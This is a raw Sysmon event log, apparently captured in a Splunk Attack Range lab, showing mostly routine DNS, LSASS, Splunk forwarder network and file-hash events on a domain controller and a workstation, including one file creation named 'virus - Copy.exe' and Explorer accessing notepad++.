07:48:12.295{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57211-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001047329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.970{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local55715- 354300x80000000000000001047328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.969{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local63782- 354300x80000000000000001047327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.968{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55054- 354300x80000000000000001047326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.967{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local61136- 354300x80000000000000001047325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.965{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61718- 354300x80000000000000001047324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.964{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local63948- 354300x80000000000000001047323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.963{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local56018- 354300x80000000000000001047322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.963{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local56031- 354300x80000000000000001047321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.961{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58627- 354300x80000000000000001047320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.960{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local63965- 354300x80000000000000001047319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.959{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local59564- 354300x80000000000000001047318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.957{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local59824- 354300x80000000000000001047317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.956{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local54709- 354300x80000000000000001047316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.955{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local64188- 354300x80000000000000001047315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.954{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local53687- 354300x80000000000000001047314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.953{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local58849- 354300x80000000000000001047313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.952{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local65455- 354300x80000000000000001047312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.950{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61152- 354300x80000000000000001047311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.949{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local60493- 354300x80000000000000001047310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.947{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local54078- 354300x80000000000000001047309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.945{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53744- 354300x80000000000000001047308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.945{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62085- 354300x80000000000000001047307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.937{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53775- 354300x80000000000000001047306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.936{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local58883- 354300x80000000000000001047305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.936{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55404- 354300x80000000000000001047304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.934{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local53248- 354300x80000000000000001047303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.934{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55794- 354300x80000000000000001047302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.933{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local57718- 354300x80000000000000001047301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.932{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local60908- 354300x80000000000000001047300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.929{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local62674- 354300x80000000000000001047299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.929{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-890.attackrange.local62674-false10.0.1.14win-dc-890.attackrange.local53domain 354300x80000000000000001047298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.928{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62260- 354300x80000000000000001047297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.928{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62260-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domain 354300x80000000000000001047296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.919{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50965-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001047295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.919{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50965-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001047294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.918{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50964-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001047293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.918{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50964-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 23542300x80000000000000001047292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:14.381{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACF9E7083283591250BABF71865EFFAF,SHA256=1348CB8A97087BB70CD45899F17E3E4CC98BAE3EF867EA8150210A87444FBDBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:14.381{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=06C8AE7ED812851052778A1AFE15E838,SHA256=799F0025284F0048C041692A1F13DE94ED40841D84399DD76670D79396A8275B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:05.733{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50963-false10.0.1.12-8000- 11241100x80000000000000001047289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localEXE2021-07-12 07:48:14.097{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Temp\test\virus - Copy.exe2021-07-12 07:47:58.225 23542300x80000000000000001047341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:15.765{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F103ABF9EA1607008FE93143F2EED69A,SHA256=0E7A7660C066DF19721ED5291FB495DCCA0219BF9C99E6AF22ACFA3BE9F61D11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806800Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:15.660{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=403F82C24AC86440BCABE0A480CE0221,SHA256=0EC76271AA39F92FF42FA44C876720649DC4A14D810FBE41FD817684E3AA1928,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.980{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local61885- 354300x80000000000000001047339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.979{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58829- 354300x80000000000000001047338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.978{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local54530- 354300x80000000000000001047337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.977{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58800- 354300x80000000000000001047336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.976{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local63057- 354300x80000000000000001047335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.976{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53579- 354300x80000000000000001047334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.975{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local58889- 354300x80000000000000001047333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.974{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local63131- 354300x80000000000000001047332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.973{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local61760- 354300x80000000000000001047331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.973{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55331- 23542300x8000000000000000806801Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:16.692{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF1AFE15EE1FB73B9965DEBCB266329F,SHA256=46E257099543434577653AC57F5B30EB3BA1755C8767F8D5B231C6DFB0CEDBEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:16.779{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3896C0499E677958B5CCCDEB29839A9F,SHA256=75E1ACE6C89CB250901DA9ECD63BC3FF1FCA3D9456126B5FF77A3AA7507E6571,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:07.918{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50966-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001047342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:07.917{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50966-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001047345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:17.794{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C6DBC7519F20A244DAE18CD56F2408,SHA256=565D97CFB98A3D6EC9892E5FE6E91738A3484107D3BF09134F73AAAC5E673871,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806802Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:17.723{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5787C23B7E01100CC28719DE1712EFBD,SHA256=13DF838F048BE5A17C484E1F9F1AF74DA8C15975E8D50063258AEE35FBE55DEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806804Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:18.770{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=724866EB3284D82EF748056A8ED27309,SHA256=40C753316EAF2D5B064A0D0452C1DE3C6E9D5908D95EFD14932C43532D0855BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:18.808{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DECFA080905A158CCBC81EFC7114F0A1,SHA256=9EF3A9F0DA0E6271C57997796A5B09133AA2664ACE23E3E8E8348CDFC25B12A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:18.225{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806803Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:17.309{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57212-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806805Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:19.770{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38EA1683B02C2947AA2BDADAD12D27FB,SHA256=FA5BABC3B345E40BE49933015D4CD12B16F6489D8C4589AA95D43DA08AC61E1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.823{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EDA04630820D9876395D471EC67C078,SHA256=F59687CEBE86F3D01973BF86879D7057A9AC51F4C850FB450D23D6726B781908,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:10.793{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50967-false10.0.1.12-8000- 10341000x80000000000000001047354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.124{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.124{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 